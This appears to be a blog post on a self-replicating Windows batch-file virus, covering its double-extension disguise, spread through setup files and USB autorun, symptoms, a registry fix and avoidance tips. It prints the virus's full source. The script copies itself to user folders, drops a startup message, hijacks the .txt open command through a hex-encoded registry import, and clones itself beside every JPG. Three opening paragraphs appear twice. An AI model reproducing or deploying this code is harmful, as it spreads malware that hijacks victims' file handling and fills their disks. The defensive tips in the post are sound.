Maybe you still remember a few years ago, there are viruses that can duplicate
itself by using a file extension. One of computer virus type is a virus made
from Batch files. During the batch file can still operate on the Operating
System, so this type of file can still be used for bad purposes.
Basically the contents of the batch file is a sequence of DOS commands, where to make those commands you can use NOTEPAD only. Simple, isn't it? But do not ever shrugged it, because for those of you who ever been victims of this virus has already know what the effects of this virus.
This virus working use double extensions, when clicked it will copy itself using file names with extension JPG (image file) which are in the same folder location. An example is, if in the same folder there is a file named sexy.jpg, then the batch file will copy itself to create a new file named sexy.jpg.bat.
Besides able to make itself similar to files with extension JPG, this virus also will duplicate itself as files with extension TXT.
Basically the contents of the batch file is a sequence of DOS commands, where to make those commands you can use NOTEPAD only. Simple, isn't it? But do not ever shrugged it, because for those of you who ever been victims of this virus has already know what the effects of this virus.
This virus working use double extensions, when clicked it will copy itself using file names with extension JPG (image file) which are in the same folder location. An example is, if in the same folder there is a file named sexy.jpg, then the batch file will copy itself to create a new file named sexy.jpg.bat.
Besides able to make itself similar to files with extension JPG, this virus also will duplicate itself as files with extension TXT.
The techniques used by this virus to infect every file are using the file with
extension TXT. If there is in the folder the file with extension TXT and we open
it, then the virus will automatically go into that folder.
| 1 | @Echo off |
| 2 | If not Exist C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat Copy %0 C:\DOCUME~1\ALLUSE~1\DOCUME~1\Readme.bat >Null |
| 3 |
If not Exist
C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\message.wri
Goto message
|
| 4 | Goto Infect |
| 5 | |
| 6 | :message |
| 7 | Echo You are under attack! >message.wri |
| 8 | Echo Your PC no longer safe. >>message.wri |
| 9 | Echo It's time to lay eggs and breed. >>message.wri |
| 10 | Copy message.wri C:\DOCUME~1\ALLUSE~1\STARTM~1\Programs\Startup\message.wri >Null |
| 11 | |
| 12 | Echo Windows Registry Editor Version 5.00 >Infect.reg |
| 13 | Echo. >>Infect.reg |
| 14 | Echo [HKEY_CLASSES_ROOT\txtfile\shell\open\command] >>Infect.reg |
| 15 | Echo @=hex(2) :43, 00, 3a, 00, 5c, 00, 44, 00, 6f, 00, 63, 00, 75, 00, 6d, 00, 65, 00, 6e, 00, 74, 00, 73, \ >>Infect.reg |
| 16 | Echo 00, 20, 00, 61, 00, 6e, 00, 64, 00, 20, 00, 53, 00, 65, 00, 74, 00, 74, 00, 69, 00, 6e, 00, 67, 00, \ >>Infect.reg |
| 17 | Echo 73, 00, 5c, 00, 41, 00, 6c, 00, 6c, 00, 20, 00, 55, 00, 73, 00, 65, 00, 72, 00, 73, 00, 5c, 00, 44, \ >>Infect.reg |
| 18 | Echo 00, 6f, 00, 63, 00, 75, 00, 6d, 00, 65, 00, 6e, 00, 74, 00, 73, 00, 5c, 00, 52, 00, 65, 00, 61, 00, \ >>Infect.reg |
| 19 | Echo 64, 00, 6d, 00, 65, 00, 2e, 00, 62, 00, 61, 00, 74, 00, 20, 00, 25, 00, 31, 00, 00, 00 >>Infect.reg |
| 20 | |
| 21 | Copy Infect.reg c:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg >Null |
| 22 | C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg |
| 23 | @Del Infect.reg |
| 24 | @Del C:\DOCUME~1\ALLUSE~1\DOCUME~1\Infect.reg |
| 25 | |
| 26 | :Infect |
| 27 | Start %SystemRoot%\system32\NOTEPAD.EXE %1 |
| 28 | Copy %0 %1.bat >Null |
| 29 | For %%A in (*.Jpg) do type %0 >%%A.bat |
| 30 | @Del null |
| 31 | Exit |
Above is the DOS command contained in
the BAT file that serves as a virus.
How is the beginning of a virus
can infect our computer?
Internet is like land mines, if we
are not careful then we can become the victims. The origin of the virus spread
begin from the internet, then continues offline from one PC to another PC with a
USB flash drive using autorun script. The method of infection is as follows:
1. With the method of disguise.
To carry out the action, the BAT file
created has double file extension. The file name is made as attractive as
possible so that the victim was curious and clicked on the file (example:
sexy.jpg.bat). BAT extension will not be visible when the "Hide extensions
for known file types = true" in the settings "folder options". Victims of this
method are usually the peoples who do not understand about file extension.
2. Inserted in the setup file or
application.
Virus makers are now very careful,
they play very neat. The number 1 spread method is very risky, because people
are now very careful when clicking a suspicious file. They used a method with
insert the virus in the setup file. When the setup file or an application is
executed, the virus spread so easily can run smoothly.
What are the signs my PC was
infected with a virus of this type?
If your PC has been infected with
this virus type, then your hard disk space is reduced drastically due to
swelling of the files that are not reasonable.
What should I do to fix it?
Run REGEDIT, go to
HKEY_CLASSES_ROOT\txtfile\shell\open\command
change its value as before to %SystemRoot%\system32\NOTEPAD.EXE
%1
Tips to avoid the virus:
1. Turn off "autorun" service on your
PC (For CD / DVD ROM, USB Flash and Hard disk).
2. Do not install the setup files
from untrusted sources.
3. Do not click or execute on
suspicious files.
Other suggestions:
If your PC feels heavy when running an application, you should uninstall it.
Keyword:
Virus | Example of Virus | How to handle the virus | How to make a virus | Tips
to avoid the virus
|
You may also like: